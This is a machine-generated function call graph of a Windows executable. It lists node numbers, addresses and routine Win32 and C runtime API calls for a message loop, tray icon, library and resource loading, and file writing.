93138 343e05 93139 3436b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93138->93139 93139->93002 93141 34e8f6 93140->93141 93165 34e906 Mailbox 93140->93165 93142 34ed52 93141->93142 93141->93165 94278 35e3cd 335 API calls 93142->94278 93143 38cc5c 86 API calls 93143->93165 93144 34ebc7 93146 343e2a 93144->93146 94279 342ff6 16 API calls 93144->94279 93146->92979 93202 343847 Shell_NotifyIconW _memset 93146->93202 93148 34ed63 93148->93146 93150 34ed70 93148->93150 93149 34e94c PeekMessageW 93149->93165 94280 35e312 335 API calls Mailbox 93150->94280 93152 34ed77 LockWindowUpdate DestroyWindow GetMessageW 93152->93146 93155 34eda9 93152->93155 93153 3b526e Sleep 93153->93165 93156 3b59ef TranslateMessage DispatchMessageW GetMessageW 93155->93156 93156->93156 93158 3b5a1f 93156->93158 93158->93146 93159 34ed21 PeekMessageW 93159->93165 93160 341caa 49 API calls 93160->93165 93161 34ebf7 timeGetTime 93161->93165 93163 35f4ea 48 API calls 93163->93165 93164 346eed 48 API calls 93164->93165 93165->93143 93165->93144 93165->93149 93165->93153 93165->93159 93165->93160 93165->93161 93165->93163 93165->93164 93166 34ed3a TranslateMessage DispatchMessageW 93165->93166 93167 3b5429 Mailbox 93165->93167 93168 3b5557 WaitForSingleObject 93165->93168 93171 3b588f Sleep 93165->93171 93172 34edae timeGetTime 93165->93172 93175 3b5733 Sleep 93165->93175 93178 342aae 311 API calls 93165->93178 93183 3b5445 Sleep 93165->93183 93199 34ce19 48 API calls 93165->93199 93200 34d6e9 55 API calls 93165->93200 94108 34ef00 93165->94108 94113 34f110 93165->94113 94178 3545e0 93165->94178 94195 35e244 93165->94195 94200 35dc5f 93165->94200 94205 34eed0 335 API calls Mailbox 93165->94205 94206 353200 93165->94206 94282 3a8d23 48 API calls 93165->94282 94286 34fe30 93165->94286 93166->93159 93167->93165 93170 34d7f7 48 API calls 93167->93170 93177 3b5926 GetExitCodeProcess 93167->93177 93180 35dc38 timeGetTime 93167->93180 93167->93183 93184 3b5432 Sleep 93167->93184 93185 3a8c4b 108 API calls 93167->93185 93186 342c79 107 API calls 93167->93186 93188 3b59ae Sleep 93167->93188 93189 34ce19 48 API calls 93167->93189 93193 34d6e9 55 API calls 93167->93193 94283 384cbe 49 API calls Mailbox 93167->94283 94284 341caa 49 API calls 93167->94284 94285 342aae 335 API calls 93167->94285 94315 39ccb2 50 API calls 93167->94315 94316 387a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93167->94316 94317 386532 63 API calls 3 library calls 93167->94317 93168->93165 93169 3b5574 GetExitCodeProcess CloseHandle 93168->93169 93169->93165 93170->93167 93171->93167 94281 341caa 49 API calls 93172->94281 93175->93167 93181 3b593c WaitForSingleObject 93177->93181 93182 3b5952 CloseHandle 93177->93182 93178->93165 93180->93167 93181->93165 93181->93182 93182->93167 93183->93165 93184->93183 93185->93167 93186->93167 93188->93165 93189->93167 93193->93167 93199->93165 93200->93165 93201->93004 93202->92979 93203->92986 93204->92998 93206 34d7f7 48 API calls 93205->93206 93207 3461db 93206->93207 93208 346009 93207->93208 93209 346016 __ftell_nolock 93208->93209 93210 346a63 48 API calls 93209->93210 93214 34617c Mailbox 93209->93214 93212 346048 93210->93212 93221 34607e Mailbox 93212->93221 93295 3461a6 93212->93295 93213 3461a6 48 API calls 93213->93221 93214->93030 93215 34614f 93215->93214 93216 34ce19 48 API calls 93215->93216 93218 346170 93216->93218 93217 34ce19 48 API calls 93217->93221 93219 3464cf 48 API calls 93218->93219 93219->93214 93220 3464cf 48 API calls 93220->93221 93221->93213 93221->93214 93221->93215 93221->93217 93221->93220 93298 3441a9 93222->93298 93225 343a06 93225->93036 93228 3b2ff0 93230 361c9d _free 47 API calls 93228->93230 93231 3b2ffd 93230->93231 93232 344252 84 API calls 93231->93232 93233 3b3006 93232->93233 93233->93233 93235 35f4ea 48 API calls 93234->93235 93236 346237 93235->93236 93236->93041 93238 34d6f4 93237->93238 93239 34d71b 93238->93239 93810 34d764 55 API calls 93238->93810 93239->93044 93242 34d654 93241->93242 93250 34d67e 93241->93250 93243 34d65b 93242->93243 93247 34d6c2 93242->93247 93244 34d6ab 93243->93244 93245 34d666 93243->93245 93244->93250 93812 35dce0 53 API calls 93244->93812 93811 34d9a0 53 API calls __cinit 93245->93811 93247->93244 93813 35dce0 53 API calls 93247->93813 93250->93052 93252 346406 93251->93252 93253 34641f 93251->93253 93255 346eed 48 API calls 93252->93255 93254 346a63 48 API calls 93253->93254 93256 3462d1 93254->93256 93255->93256 93257 360fa7 93256->93257 93258 360fb3 93257->93258 93259 361028 93257->93259 93266 360fd8 93258->93266 93814 367c0e 47 API calls __getptd_noexit 93258->93814 93816 36103a 59 API calls 3 library calls 93259->93816 93262 361035 93262->93058 93263 360fbf 93815 366e10 8 API calls __Wcsftime_l 93263->93815 93265 360fca 93265->93058 93266->93058 93268 35c064 93267->93268 93270 35c069 Mailbox 93267->93270 93817 35c1af 48 API calls 93268->93817 93276 35c077 93270->93276 93818 35c15c 48 API calls 93270->93818 93272 35f4ea 48 API calls 93273 35c108 93272->93273 93275 35f4ea 48 API calls 93273->93275 93274 35c152 93274->93089 93277 35c113 93275->93277 93276->93272 93276->93274 93277->93089 93277->93277 93279 351cf6 93278->93279 93282 351ba2 93278->93282 93279->93097 93280 351bae 93287 351bb9 93280->93287 93820 35c15c 48 API calls 93280->93820 93282->93280 93283 35f4ea 48 API calls 93282->93283 93284 3b49c4 93283->93284 93285 35f4ea 48 API calls 93284->93285 93293 3b49cf 93285->93293 93286 351c5d 93286->93097 93287->93286 93288 35f4ea 48 API calls 93287->93288 93289 351c9f 93288->93289 93290 351cb2 93289->93290 93819 342925 48 API calls 93289->93819 93290->93097 93292 35f4ea 48 API calls 93292->93293 93293->93280 93293->93292 93294->93097 93296 34bdfa 48 API calls 93295->93296 93297 3461b1 93296->93297 93297->93212 93363 344214 93298->93363 93303 3441d4 LoadLibraryExW 93373 344291 93303->93373 93304 3b4f73 93306 344252 84 API calls 93304->93306 93308 3b4f7a 93306->93308 93310 344291 3 API calls 93308->93310 93311 3b4f82 93310->93311 93399 3444ed 93311->93399 93312 3441fb 93312->93311 93313 344207 93312->93313 93315 344252 84 API calls 93313->93315 93317 3439fe 93315->93317 93317->93225 93322 38c396 93317->93322 93319 3b4fa9 93407 344950 93319->93407 93321 3b4fb6 93323 344517 83 API calls 93322->93323 93324 38c405 93323->93324 93584 38c56d 93324->93584 93327 3444ed 64 API calls 93328 38c432 93327->93328 93329 3444ed 64 API calls 93328->93329 93330 38c442 93329->93330 93331 3444ed 64 API calls 93330->93331 93332 38c45d 93331->93332 93333 3444ed 64 API calls 93332->93333 93334 38c478 93333->93334 93335 344517 83 API calls 93334->93335 93336 38c48f 93335->93336 93337 36395c __malloc_crt 47 API calls 93336->93337 93338 38c496 93337->93338 93339 36395c __malloc_crt 47 API calls 93338->93339 93340 38c4a0 93339->93340 93341 3444ed 64 API calls 93340->93341 93342 38c4b4 93341->93342 93343 38bf5a GetSystemTimeAsFileTime 93342->93343 93344 38c4c7 93343->93344 93345 38c4dc 93344->93345 93346 38c4f1 93344->93346 93347 361c9d _free 47 API calls 93345->93347 93348 38c556 93346->93348 93349 38c4f7 93346->93349 93350 38c4e2 93347->93350 93352 361c9d _free 47 API calls 93348->93352 93590 38b965 118 API calls __fcloseall 93349->93590 93353 361c9d _free 47 API calls 93350->93353 93355 38c41b 93352->93355 93353->93355 93354 38c54e 93356 361c9d _free 47 API calls 93354->93356 93355->93228 93357 344252 93355->93357 93356->93355 93358 34425c 93357->93358 93360 344263 93357->93360 93591 3635e4 93358->93591 93361 344272 93360->93361 93362 344283 FreeLibrary 93360->93362 93361->93228 93362->93361 93412 344339 93363->93412 93366 34423c 93368 344244 FreeLibrary 93366->93368 93369 3441bb 93366->93369 93368->93369 93370 363499 93369->93370 93420 3634ae 93370->93420 93372 3441c8 93372->93303 93372->93304 93498 3442e4 93373->93498 93376 3442b8 93377 3442c1 FreeLibrary 93376->93377 93378 3441ec 93376->93378 93377->93378 93380 344380 93378->93380 93381 35f4ea 48 API calls 93380->93381 93382 344395 93381->93382 93383 3447b7 48 API calls 93382->93383 93384 3443a1 ___crtGetEnvironmentStringsW 93383->93384 93385 3443dc 93384->93385 93387 3444d1 93384->93387 93388 344499 93384->93388 93386 344950 57 API calls 93385->93386 93394 3443e5 93386->93394 93517 38c750 93 API calls 93387->93517 93506 34406b CreateStreamOnHGlobal 93388->93506 93391 3444ed 64 API calls 93391->93394 93393 344479 93393->93312 93394->93391 93394->93393 93395 3b4ed7 93394->93395 93512 344517 93394->93512 93396 344517 83 API calls 93395->93396 93397 3b4eeb 93396->93397 93398 3444ed 64 API calls 93397->93398 93398->93393 93400 3b4fc0 93399->93400 93401 3444ff 93399->93401 93541 36381e 93401->93541 93404 38bf5a 93561 38bdb4 93404->93561 93406 38bf70 93406->93319 93408 3b5002 93407->93408 93409 34495f 93407->93409 93566 363e65 93409->93566 93411 344967 93411->93321 93416 34434b 93412->93416 93415 344321 LoadLibraryA GetProcAddress 93415->93366 93417 34422f 93416->93417 93418 344354 LoadLibraryA 93416->93418 93417->93366 93417->93415 93418->93417 93419 344365 GetProcAddress 93418->93419 93419->93417 93423 3634ba __fcloseall 93420->93423 93421 3634cd 93468 367c0e 47 API calls __getptd_noexit 93421->93468 93423->93421 93424 3634fe 93423->93424 93439 36e4c8 93424->93439 93425 3634d2 93469 366e10 8 API calls __Wcsftime_l 93425->93469 93428 363503 93429 36350c 93428->93429 93430 363519 93428->93430 93470 367c0e 47 API calls __getptd_noexit 93429->93470 93432 363543 93430->93432 93433 363523 93430->93433 93453 36e5e0 93432->93453 93471 367c0e 47 API calls __getptd_noexit 93433->93471 93434 3634dd __fcloseall @_EH4_CallFilterFunc@8 93434->93372 93440 36e4d4 __fcloseall 93439->93440 93441 367cf4 __lock 47 API calls 93440->93441 93451 36e4e2 93441->93451 93442 36e552 93473 36e5d7 93442->93473 93443 36e559 93444 3669d0 __malloc_crt 47 API calls 93443->93444 93446 36e560 93444->93446 93446->93442 93448 36e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93446->93448 93447 36e5cc __fcloseall 93447->93428 93448->93442 93449 367d7c __mtinitlocknum 47 API calls 93449->93451 93451->93442 93451->93443 93451->93449 93476 364e5b 48 API calls __lock 93451->93476 93477 364ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93451->93477 93462 36e600 __wopenfile 93453->93462 93454 36e61a 93482 367c0e 47 API calls __getptd_noexit 93454->93482 93456 36e7d5 93456->93454 93460 36e838 93456->93460 93457 36e61f 93483 366e10 8 API calls __Wcsftime_l 93457->93483 93459 36354e 93472 363570 LeaveCriticalSection LeaveCriticalSection _fseek 93459->93472 93479 3763c9 93460->93479 93462->93454 93462->93456 93462->93462 93484 36185b 59 API calls 2 library calls 93462->93484 93464 36e7ce 93464->93456 93485 36185b 59 API calls 2 library calls 93464->93485 93466 36e7ed 93466->93456 93486 36185b 59 API calls 2 library calls 93466->93486 93468->93425 93469->93434 93470->93434 93471->93434 93472->93434 93478 367e58 LeaveCriticalSection 93473->93478 93475 36e5de 93475->93447 93476->93451 93477->93451 93478->93475 93487 375bb1 93479->93487 93481 3763e2 93481->93459 93482->93457 93483->93459 93484->93464 93485->93466 93486->93456 93489 375bbd __fcloseall 93487->93489 93488 375bcf 93490 367c0e __Wcsftime_l 47 API calls 93488->93490 93489->93488 93491 375c06 93489->93491 93492 375bd4 93490->93492 93494 375c78 __wsopen_helper 110 API calls 93491->93494 93493 366e10 __Wcsftime_l 8 API calls 93492->93493 93495 375bde __fcloseall 93493->93495 93496 375c23 93494->93496 93495->93481 93497 375c4c __wsopen_helper LeaveCriticalSection 93496->93497 93497->93495 93502 3442f6 93498->93502 93501 3442cc LoadLibraryA GetProcAddress 93501->93376 93503 3442aa 93502->93503 93504 3442ff LoadLibraryA 93502->93504 93503->93376 93503->93501 93504->93503 93505 344310 GetProcAddress 93504->93505 93505->93503 93507 344085 FindResourceExW 93506->93507 93511 3440a2 93506->93511 93508 3b4f16 LoadResource 93507->93508 93507->93511 93509 3b4f2b SizeofResource 93508->93509 93508->93511 93510 3b4f3f LockResource 93509->93510 93509->93511 93510->93511 93511->93385 93513 344526 93512->93513 93514 3b4fe0 93512->93514 93518 363a8d 93513->93518 93516 344534 93516->93394 93517->93385 93519 363a99 __fcloseall 93518->93519 93520 363aa7 93519->93520 93522 363acd 93519->93522 93531 367c0e 47 API calls __getptd_noexit 93520->93531 93533 364e1c 93522->93533 93523 363aac 93532 366e10 8 API calls __Wcsftime_l 93523->93532 93526 363ad3 93539 3639fe 81 API calls 3 library calls 93526->93539 93528 363ae2 93540 363b04 LeaveCriticalSection LeaveCriticalSection _fseek 93528->93540 93530 363ab7 __fcloseall 93530->93516 93531->93523 93532->93530 93534 364e4e EnterCriticalSection 93533->93534 93535 364e2c 93533->93535 93536 364e44 93534->93536 93535->93534 93537 364e34 93535->93537 93536->93526 93538 367cf4 __lock 47 API calls 93537->93538 93538->93536 93539->93528 93540->93530 93544 363839 93541->93544 93543 344510 93543->93404 93545 363845 __fcloseall 93544->93545 93546 36385b _memset 93545->93546 93547 363888 93545->93547 93548 363880 __fcloseall 93545->93548 93557 367c0e 47 API calls __getptd_noexit 93546->93557 93549 364e1c __lock_file 48 API calls 93547->93549 93548->93543 93551 36388e 93549->93551 93559 36365b 62 API calls 6 library calls 93551->93559 93552 363875 93558 366e10 8 API calls __Wcsftime_l 93552->93558 93555 3638a4 93560 3638c2 LeaveCriticalSection LeaveCriticalSection _fseek 93555->93560 93557->93552 93558->93548 93559->93555 93560->93548 93564 36344a GetSystemTimeAsFileTime 93561->93564 93563 38bdc3 93563->93406 93565 363478 __aulldiv 93564->93565 93565->93563 93567 363e71 __fcloseall 93566->93567 93568 363e94 93567->93568 93569 363e7f 93567->93569 93571 364e1c __lock_file 48 API calls 93568->93571 93580 367c0e 47 API calls __getptd_noexit 93569->93580 93573 363e9a 93571->93573 93572 363e84 93581 366e10 8 API calls __Wcsftime_l 93572->93581 93582 363b0c 55 API calls 4 library calls 93573->93582 93576 363ea5 93583 363ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93576->93583 93578 363eb7 93579 363e8f __fcloseall 93578->93579 93579->93411 93580->93572 93581->93579 93582->93576 93583->93578 93586 38c581 __tzset_nolock _wcscmp 93584->93586 93585 38bf5a GetSystemTimeAsFileTime 93585->93586 93586->93585 93587 3444ed 64 API calls 93586->93587 93588 38c417 93586->93588 93589 344517 83 API calls 93586->93589 93587->93586 93588->93327 93588->93355 93589->93586 93590->93354 93592 3635f0 __fcloseall 93591->93592 93593 363604 93592->93593 93594 36361c 93592->93594 93620 367c0e 47 API calls __getptd_noexit 93593->93620 93596 364e1c __lock_file 48 API calls 93594->93596 93600 363614 __fcloseall 93594->93600 93598 36362e 93596->93598 93597 363609 93621 366e10 8 API calls __Wcsftime_l 93597->93621 93604 363578 93598->93604 93600->93360 93605 363587 93604->93605 93606 36359b 93604->93606 93663 367c0e 47 API calls __getptd_noexit 93605->93663 93608 363597 93606->93608 93623 362c84 93606->93623 93622 363653 LeaveCriticalSection LeaveCriticalSection _fseek 93608->93622 93609 36358c 93664 366e10 8 API calls __Wcsftime_l 93609->93664 93616 3635b5 93640 36e9d2 93616->93640 93618 3635bb 93618->93608 93619 361c9d _free 47 API calls 93618->93619 93619->93608 93620->93597 93621->93600 93622->93600 93624 362c97 93623->93624 93625 362cbb 93623->93625 93624->93625 93626 362933 __ftell_nolock 47 API calls 93624->93626 93629 36eb36 93625->93629 93627 362cb4 93626->93627 93665 36af61 93627->93665 93630 3635af 93629->93630 93631 36eb43 93629->93631 93633 362933 93630->93633 93631->93630 93632 361c9d _free 47 API calls 93631->93632 93632->93630 93634 362952 93633->93634 93635 36293d 93633->93635 93634->93616 93771 367c0e 47 API calls __getptd_noexit 93635->93771 93637 362942 93772 366e10 8 API calls __Wcsftime_l 93637->93772 93639 36294d 93639->93616 93641 36e9de __fcloseall 93640->93641 93642 36e9e6 93641->93642 93643 36e9fe 93641->93643 93788 367bda 47 API calls __getptd_noexit 93642->93788 93645 36ea7b 93643->93645 93650 36ea28 93643->93650 93792 367bda 47 API calls __getptd_noexit 93645->93792 93646 36e9eb 93789 367c0e 47 API calls __getptd_noexit 93646->93789 93649 36ea80 93793 367c0e 47 API calls __getptd_noexit 93649->93793 93652 36a8ed ___lock_fhandle 49 API calls 93650->93652 93653 36ea2e 93652->93653 93655 36ea41 93653->93655 93656 36ea4c 93653->93656 93654 36ea88 93794 366e10 8 API calls __Wcsftime_l 93654->93794 93773 36ea9c 93655->93773 93790 367c0e 47 API calls __getptd_noexit 93656->93790 93659 36e9f3 __fcloseall 93659->93618 93661 36ea47 93791 36ea73 LeaveCriticalSection __unlock_fhandle 93661->93791 93663->93609 93664->93608 93666 36af6d __fcloseall 93665->93666 93667 36af75 93666->93667 93668 36af8d 93666->93668 93763 367bda 47 API calls __getptd_noexit 93667->93763 93669 36b022 93668->93669 93673 36afbf 93668->93673 93768 367bda 47 API calls __getptd_noexit 93669->93768 93672 36af7a 93764 367c0e 47 API calls __getptd_noexit 93672->93764 93690 36a8ed 93673->93690 93674 36b027 93769 367c0e 47 API calls __getptd_noexit 93674->93769 93678 36afc5 93680 36afeb 93678->93680 93681 36afd8 93678->93681 93679 36b02f 93770 366e10 8 API calls __Wcsftime_l 93679->93770 93765 367c0e 47 API calls __getptd_noexit 93680->93765 93699 36b043 93681->93699 93683 36af82 __fcloseall 93683->93625 93686 36afe4 93767 36b01a LeaveCriticalSection __unlock_fhandle 93686->93767 93687 36aff0 93766 367bda 47 API calls __getptd_noexit 93687->93766 93691 36a8f9 __fcloseall 93690->93691 93692 36a946 EnterCriticalSection 93691->93692 93693 367cf4 __lock 47 API calls 93691->93693 93694 36a96c __fcloseall 93692->93694 93695 36a91d 93693->93695 93694->93678 93696 36a93a 93695->93696 93697 36a928 InitializeCriticalSectionAndSpinCount 93695->93697 93698 36a970 ___lock_fhandle LeaveCriticalSection 93696->93698 93697->93696 93698->93692 93700 36b050 __ftell_nolock 93699->93700 93701 36b0ac 93700->93701 93702 36b08d 93700->93702 93730 36b082 93700->93730 93705 36b105 93701->93705 93706 36b0e9 93701->93706 93704 367bda __free_osfhnd 47 API calls 93702->93704 93703 36a70c __fltout2 6 API calls 93707 36b86b 93703->93707 93708 36b092 93704->93708 93709 36b11c 93705->93709 93712 36f82f __lseeki64_nolock 49 API calls 93705->93712 93711 367bda __free_osfhnd 47 API calls 93706->93711 93707->93686 93710 367c0e __Wcsftime_l 47 API calls 93708->93710 93714 373bf2 __flswbuf 47 API calls 93709->93714 93713 36b099 93710->93713 93715 36b0ee 93711->93715 93712->93709 93716 366e10 __Wcsftime_l 8 API calls 93713->93716 93717 36b12a 93714->93717 93718 367c0e __Wcsftime_l 47 API calls 93715->93718 93716->93730 93719 36b44b 93717->93719 93725 367a0d __beginthread 47 API calls 93717->93725 93720 36b0f5 93718->93720 93721 36b463 93719->93721 93722 36b7b8 WriteFile 93719->93722 93723 366e10 __Wcsftime_l 8 API calls 93720->93723 93726 36b55a 93721->93726 93734 36b479 93721->93734 93724 36b7e1 GetLastError 93722->93724 93732 36b410 93722->93732 93723->93730 93724->93732 93727 36b150 GetConsoleMode 93725->93727 93737 36b663 93726->93737 93740 36b565 93726->93740 93727->93719 93729 36b189 93727->93729 93728 36b81b 93728->93730 93731 367c0e __Wcsftime_l 47 API calls 93728->93731 93729->93719 93733 36b199 GetConsoleCP 93729->93733 93730->93703 93738 36b843 93731->93738 93732->93728 93732->93730 93739 36b7f7 93732->93739 93733->93732 93750 36b1c2 93733->93750 93734->93728 93735 36b4e9 WriteFile 93734->93735 93735->93724 93736 36b526 93735->93736 93736->93732 93736->93734 93758 36b555 93736->93758 93737->93728 93741 36b6d8 WideCharToMultiByte 93737->93741 93742 367bda __free_osfhnd 47 API calls 93738->93742 93743 36b812 93739->93743 93744 36b7fe 93739->93744 93740->93728 93745 36b5de WriteFile 93740->93745 93741->93724 93746 36b71f 93741->93746 93742->93730 93748 367bed __dosmaperr 47 API calls 93743->93748 93747 367c0e __Wcsftime_l 47 API calls 93744->93747 93745->93724 93749 36b62d 93745->93749 93746->93732 93746->93737 93751 36b727 WriteFile 93746->93751 93746->93758 93752 36b803 93747->93752 93748->93730 93749->93732 93749->93740 93749->93758 93750->93732 93753 361688 __chsize_nolock 57 API calls 93750->93753 93756 3740f7 59 API calls __chsize_nolock 93750->93756 93759 36b28f WideCharToMultiByte 93750->93759 93761 36b2f6 93750->93761 93751->93746 93754 36b77a GetLastError 93751->93754 93755 367bda __free_osfhnd 47 API calls 93752->93755 93753->93750 93754->93746 93755->93730 93756->93750 93757 375884 WriteConsoleW CreateFileW __chsize_nolock 93757->93761 93758->93732 93759->93732 93760 36b2ca WriteFile 93759->93760 93760->93724 93760->93761 93761->93724 93761->93732 93761->93750 93761->93757 93762 36b321 WriteFile 93761->93762 93762->93724 93762->93761 93763->93672 93764->93683 93765->93687 93766->93686 93767->93683 93768->93674 93769->93679 93770->93683 93771->93637 93772->93639 93795 36aba4 93773->93795 93775 36eb00 93808 36ab1e 48 API calls 2 library calls 93775->93808 93777 36eaaa 93777->93775 93778 36eade 93777->93778 93780 36aba4 __chsize_nolock 47 API calls 93777->93780 93778->93775 93781 36aba4 __chsize_nolock 47 API calls 93778->93781 93779 36eb08 93782 36eb2a 93779->93782 93809 367bed 47 API calls 3 library calls 93779->93809 93783 36ead5 93780->93783 93784 36eaea CloseHandle 93781->93784 93782->93661 93786 36aba4 __chsize_nolock 47 API calls 93783->93786 93784->93775 93787 36eaf6 GetLastError 93784->93787 93786->93778 93787->93775 93788->93646 93789->93659 93790->93661 93791->93659 93792->93649 93793->93654 93794->93659 93796 36abaf 93795->93796 93798 36abc4 93795->93798 93797 367bda __free_osfhnd 47 API calls 93796->93797 93800 36abb4 93797->93800 93799 367bda __free_osfhnd 47 API calls 93798->93799 93801 36abe9 93798->93801 93802 36abf3 93799->93802 93803 367c0e __Wcsftime_l 47 API calls 93800->93803 93801->93777 93804 367c0e __Wcsftime_l 47 API calls 93802->93804 93805 36abbc 93803->93805 93806 36abfb 93804->93806 93805->93777 93807 366e10 __Wcsftime_l 8 API calls 93806->93807 93807->93805 93808->93779 93809->93782 93810->93239 93811->93250 93812->93250 93813->93244 93814->93263 93815->93265 93816->93262 93817->93270 93818->93276 93819->93290 93820->93287 93822 36f8a0 __ftell_nolock 93821->93822 93823 3440b4 GetLongPathNameW 93822->93823 93824 346a63 48 API calls 93823->93824 93825 3440dc 93824->93825 93826 3449a0 93825->93826 93827 34d7f7 48 API calls 93826->93827 93828 3449b2 93827->93828 93829 34660f 49 API calls 93828->93829 93830 3449bd 93829->93830 93831 3449c8 93830->93831 93832 3b2e35 93830->93832 93833 3464cf 48 API calls 93831->93833 93837 3b2e4f 93832->93837 93879 35d35e 60 API calls 93832->93879 93835 3449d4 93833->93835 93873 3428a6 93835->93873 93838 3449e7 Mailbox 93838->93113 93840 3441a9 136 API calls 93839->93840 93841 34415e 93840->93841 93842 3b3489 93841->93842 93843 3441a9 136 API calls 93841->93843 93844 38c396 122 API calls 93842->93844 93845 344172 93843->93845 93846 3b349e 93844->93846 93845->93842 93847 34417a 93845->93847 93848 3b34bf 93846->93848 93849 3b34a2 93846->93849 93851 3b34aa 93847->93851 93852 344186 93847->93852 93850 35f4ea 48 API calls 93848->93850 93853 344252 84 API calls 93849->93853 93872 3b3504 Mailbox 93850->93872 93982 386b49 87 API calls _wprintf 93851->93982 93880 34c833 93852->93880 93853->93851 93856 3b34b8 93856->93848 93858 3b36b4 93859 361c9d _free 47 API calls 93858->93859 93860 3b36bc 93859->93860 93861 344252 84 API calls 93860->93861 93866 3b36c5 93861->93866 93865 361c9d _free 47 API calls 93865->93866 93866->93865 93868 344252 84 API calls 93866->93868 93986 3825b5 86 API calls 4 library calls 93866->93986 93868->93866 93869 34ce19 48 API calls 93869->93872 93872->93858 93872->93866 93872->93869 93968 34ba85 93872->93968 93976 344dd9 93872->93976 93983 382551 48 API calls ___crtGetEnvironmentStringsW 93872->93983 93984 382472 60 API calls 2 library calls 93872->93984 93985 389c12 48 API calls 93872->93985 93874 3428b8 93873->93874 93878 3428d7 ___crtGetEnvironmentStringsW 93873->93878 93876 35f4ea 48 API calls 93874->93876 93875 35f4ea 48 API calls 93877 3428ee 93875->93877 93876->93878 93877->93838 93878->93875 93879->93832 93881 34c843 __ftell_nolock 93880->93881 93882 34c860 93881->93882 93883 3b3095 93881->93883 93992 3448ba 49 API calls 93882->93992 94011 3825b5 86 API calls 4 library calls 93883->94011 93886 3b30a8 94012 3825b5 86 API calls 4 library calls 93886->94012 93887 34c882 93993 344550 56 API calls 93887->93993 93889 34c897 93889->93886 93891 34c89f 93889->93891 93892 34d7f7 48 API calls 93891->93892 93894 34c8ab 93892->93894 93893 3b30c4 93896 34c90c 93893->93896 93994 35e968 49 API calls __ftell_nolock 93894->93994 93898 3b30d7 93896->93898 93899 34c91a 93896->93899 93897 34c8b7 93901 34d7f7 48 API calls 93897->93901 93900 344907 CloseHandle 93898->93900 93997 361dfc 93899->93997 93903 3b30e3 93900->93903 93904 34c8c3 93901->93904 93905 3441a9 136 API calls 93903->93905 93906 34660f 49 API calls 93904->93906 93907 3b310d 93905->93907 93908 34c8d1 93906->93908 93910 3b3136 93907->93910 93913 38c396 122 API calls 93907->93913 93995 35eb66 SetFilePointerEx ReadFile 93908->93995 93909 34c943 _wcscat _wcscpy 93912 34c96d SetCurrentDirectoryW 93909->93912 94013 3825b5 86 API calls 4 library calls 93910->94013 93916 35f4ea 48 API calls 93912->93916 93917 3b3129 93913->93917 93914 34c8fd 93996 3446ce SetFilePointerEx SetFilePointerEx 93914->93996 93920 34c988 93916->93920 93921 3b3152 93917->93921 93922 3b3131 93917->93922 93919 3b314d 93952 34cad1 Mailbox 93919->93952 93923 3447b7 48 API calls 93920->93923 93925 344252 84 API calls 93921->93925 93924 344252 84 API calls 93922->93924 93955 34c993 Mailbox __wsetenvp 93923->93955 93924->93910 93926 3b3157 93925->93926 93927 35f4ea 48 API calls 93926->93927 93934 3b3194 93927->93934 93928 34ca9d 94007 344907 93928->94007 93932 34caa9 SetCurrentDirectoryW 93932->93952 93933 343d98 93933->92979 93933->92988 93936 34ba85 48 API calls 93934->93936 93956 3b31dd Mailbox 93936->93956 93938 3b33ce 94018 389b72 48 API calls 93938->94018 93939 3b3467 94022 3825b5 86 API calls 4 library calls 93939->94022 93942 3b3480 93942->93928 93944 3b33f0 94019 3a29e8 48 API calls ___crtGetEnvironmentStringsW 93944->94019 93946 3b33fd 93949 361c9d _free 47 API calls 93946->93949 93948 3b345f 94021 38240b 48 API calls 3 library calls 93948->94021 93949->93952 93950 34ce19 48 API calls 93950->93955 93987 3448dd 93952->93987 93953 34ba85 48 API calls 93953->93956 93955->93928 93955->93939 93955->93948 93955->93950 94000 34b337 56 API calls _wcscpy 93955->94000 94001 35c258 GetStringTypeW 93955->94001 94002 34cb93 59 API calls __wcsnicmp 93955->94002 94003 34cb5a GetStringTypeW __wsetenvp 93955->94003 94004 3616d0 GetStringTypeW __towlower_l 93955->94004 94005 34cc24 162 API calls 3 library calls 93955->94005 94006 35c682 48 API calls 93955->94006 93956->93938 93956->93953 93960 34ce19 48 API calls 93956->93960 93963 3b3420 93956->93963 94014 382551 48 API calls ___crtGetEnvironmentStringsW 93956->94014 94015 382472 60 API calls 2 library calls 93956->94015 94016 389c12 48 API calls 93956->94016 94017 35c682 48 API calls 93956->94017 93960->93956 94020 3825b5 86 API calls 4 library calls 93963->94020 93965 3b3439 93966 361c9d _free 47 API calls 93965->93966 93967 3b344c 93966->93967 93967->93952 93969 34bb25 93968->93969 93972 34ba98 ___crtGetEnvironmentStringsW 93968->93972 93971 35f4ea 48 API calls 93969->93971 93970 35f4ea 48 API calls 93973 34ba9f 93970->93973 93971->93972 93972->93970 93974 35f4ea 48 API calls 93973->93974 93975 34bac8 93973->93975 93974->93975 93975->93872 93977 344dec 93976->93977 93980 344e9a 93976->93980 93978 35f4ea 48 API calls 93977->93978 93981 344e1e 93977->93981 93978->93981 93979 35f4ea 48 API calls 93979->93981 93980->93872 93981->93979 93981->93980 93982->93856 93983->93872 93984->93872 93985->93872 93986->93866 93988 344907 CloseHandle 93987->93988 93989 3448e5 Mailbox 93988->93989 93990 344907 CloseHandle 93989->93990 93991 3448fc 93990->93991 93991->93933 93992->93887 93993->93889 93994->93897 93995->93914 93996->93896 94023 361e46 93997->94023 94000->93955 94001->93955 94002->93955 94003->93955 94004->93955 94005->93955 94006->93955 94008 344920 94007->94008 94009 344911 94007->94009 94008->94009 94010 344925 CloseHandle 94008->94010 94009->93932 94010->94009 94011->93886 94012->93893 94013->93919 94014->93956 94015->93956 94016->93956 94017->93956 94018->93944 94019->93946 94020->93965 94021->93939 94022->93942 94024 361e55 94023->94024 94025 361e61 94023->94025 94024->94025 94034 361ed4 94024->94034 94042 369d6b 47 API calls __Wcsftime_l 94024->94042 94047 367c0e 47 API calls __getptd_noexit 94025->94047 94027 362019 94032 361e41 94027->94032 94048 366e10 8 API calls __Wcsftime_l 94027->94048 94030 361fa0 94030->94025 94030->94032 94035 361fb0 94030->94035 94031 361f5f 94031->94025 94033 361f7b 94031->94033 94044 369d6b 47 API calls __Wcsftime_l 94031->94044 94032->93909 94033->94025 94033->94032 94038 361f91 94033->94038 94034->94025 94041 361f41 94034->94041 94043 369d6b 47 API calls __Wcsftime_l 94034->94043 94046 369d6b 47 API calls __Wcsftime_l 94035->94046 94045 369d6b 47 API calls __Wcsftime_l 